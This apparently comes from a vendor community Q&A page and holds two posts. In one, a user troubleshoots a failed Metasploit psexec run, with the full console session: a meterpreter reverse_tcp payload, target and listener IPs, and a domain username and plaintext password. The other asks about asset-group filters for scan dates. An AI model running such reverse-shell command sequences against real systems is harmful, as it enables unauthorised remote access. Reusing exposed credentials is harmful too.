Knowledge Base

Ask A Question

Questions

1

psexec exploit in metasploit

Hi All, Please see the error message when running exploit. It does not seem to get past authentication. msf exploit(windows/smb/psexec) > use exploit/windows/smb/psexec msf exploit(windows/smb/psexec) > set PAYLOAD windows/x64/meterpreter/reverse_tcp PAYLOAD => windows/x64/meterpreter/reverse_tcp msf exploit(windows/smb/psexec) > set RHOST 139.49.19.13 RHOST => 139.49.19.13 msf exploit(windows/smb/psexec) > set LHOST 139.49.153.201 LHOST => 139.49.153.201 msf exploit(windows/smb/psexec) > set SMBDomain CORP SMBDomain => CORP msf exploit(windows/smb/psexec) > set SMBUser "localadmin" SMBUser => localadmin msf exploit(windows/smb/psexec) > set SMBPass "MrPassw0rd" SMBPass => MrPassw0rd msf exploit(windows/smb/psexec) > set LPORT 4444 LPORT => 443 msf exploit(windows/smb/psexec) > exploit [*] Started reverse TCP handler on 139.49.153.201:4444 [*] 139.49.19.13:445 - Connecting to the server... [*] 139.49.19.13:445 - Authenticating to 139.49.19.13:445| as user 'CORP\localadmin'... [-] 139.49.19.13:445 - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: An existing connection was forcibly closed by the remote host. [*] Exploit completed, but no session was created. msf exploit(windows/smb/psexec) > version Framework: 4.16.47-dev-b4e392e32287d35c3358e5937ba4e09d22ea813b Console : 4.16.47-dev-b4e392e32287d35c3358e5937ba4e09d22ea813b I tested authentication by running the sysinternals psexec Outside of metasploit. psexec was successful. C:\Users\Administrator>SysinternalsSuite\PsExec.exe \\139.49.19.13 -u CORP\localadmin cmd PsExec v2.2 - Execute processes remotely Copyright (C) 2001-2016 Mark Russinovich Sysinternals - www.sysinternals.com Password: Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami CORP\localadmin Same result by using exploit psexec_psh. Please give advice. Thanks. Regards, AA

Posted by aa 8 months ago

3

AD connection, "Last scan date" in DAG and no devices returned

Hi, got an issue with a DAG outcome. I have a site_A populated by AD connection with devices. Works well - it populates the site_A with names and OS, but not with IP addresses of the devices. Understood, need to do discovery to get IPs. I have no scans scheduled for site_A as it only serves as the AD connection population target. Than I have a DAG which filters the devices from site_A based on this filter: Site name - is - "site_A" Last scan date - earlier than - 1 day (1 day is for testing only, in production I will have 30 or so) The problem is that if site_A has just been populated with fresh new devices from AD connection the DAG won't return any devices regardless of the "last scan date" filter condition setting - I've tried both complementary options: (Last scan date - earlier than - 1 day) and (Last scan date - within the last - 1 day). DAG just don't show any devices from site_A. When I delete the second condition with "last scan date" and keep only the "site name..."condition the DAG correctly returns all the devices in site_A. I have also waited one, two and three days to check if days play any role in the DAG generating - but they obviously don't as I have been getting the same results each day. Am I doing anything wrong? Can anyone help? My aim is to scan the devices from site_A by small portions every day - so I thought I would manually run a scan for a small portion of devices each day until all of them are scanned and then let a site based on the DAG to be scanned every day on schedule. With the condition "Last scan date - earlier than - 30 days ago" in the DAG the daily scans will do only a small portion of devices which have not been scanned within last 30 days forever. Any better idea how to achieve that is also welcome. Thanks.

Posted by Jiri Dohnal 8 months ago